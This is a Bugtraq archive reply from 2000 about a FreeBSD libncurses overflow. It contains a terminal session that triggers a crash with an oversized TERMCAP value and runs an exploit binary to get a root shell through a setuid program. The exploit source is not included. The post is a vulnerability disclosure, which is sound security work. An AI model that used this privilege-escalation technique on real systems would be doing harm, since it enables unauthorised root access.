Bugtraq mailing list archives
Re: freebsd libncurses overflow
From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Tue, 25 Apr 2000 10:50:42 +0200
Furthermore, it is not actually a vulnerability. It seems that setuid programs will not accept an alternate termcap file via TERMCAP even under the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can only be used on your own binaries.
Sure? lubi:venglin:~> uname -a FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54 CET 2000 venglin () lubi freebsd lublin pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386 lubi:venglin:~> cat dupa.c main() { initscr(); } lubi:venglin:~> cc -o d dupa.c -lncurses lubi:venglin:~> su s/key 76 ve15188 Password: lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d lubi:venglin:/home/venglin# exit lubi:venglin:~> ./d lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'` lubi:venglin:~> ./d Segmentation fault lubi:venglin:~> ./dupaexp 4000 ret: 0xbfbfba8c # id uid=0(root) gid=1001(users) groups=1001(users), 0(wheel) Obviously, *most* binaries are dropping root privileges before using any ncurses functions. -- * Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE * * Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
Current thread:
- IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) Georgi Guninski (Apr 18)
- RFP2K03: Contemplations on dvwssr.dll and its affects on life rain forest puppy (Apr 20)
- Microsoft Security Bulletin (MS00-026) Microsoft Product Security (Apr 20)
- Re: IE 5 security vulnerablity - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) TAKAGI, Hiromitsu (Apr 20)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Przemyslaw Frasunek (Apr 25)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Bill Fumerola (Apr 24)
- Re: freebsd libncurses overflow Theo de Raadt (Apr 26)
- Denial of Service Against pcAnywhere. Vacuum (Apr 25)
- Re: ZoneAlarm Gary Buckmaster (Apr 22)
- CVS DoS Michal Szymanski (Apr 23)
- Re: CVS DoS Kris Kennaway (Apr 24)
- Re: CVS DoS Kris Kennaway (Apr 24)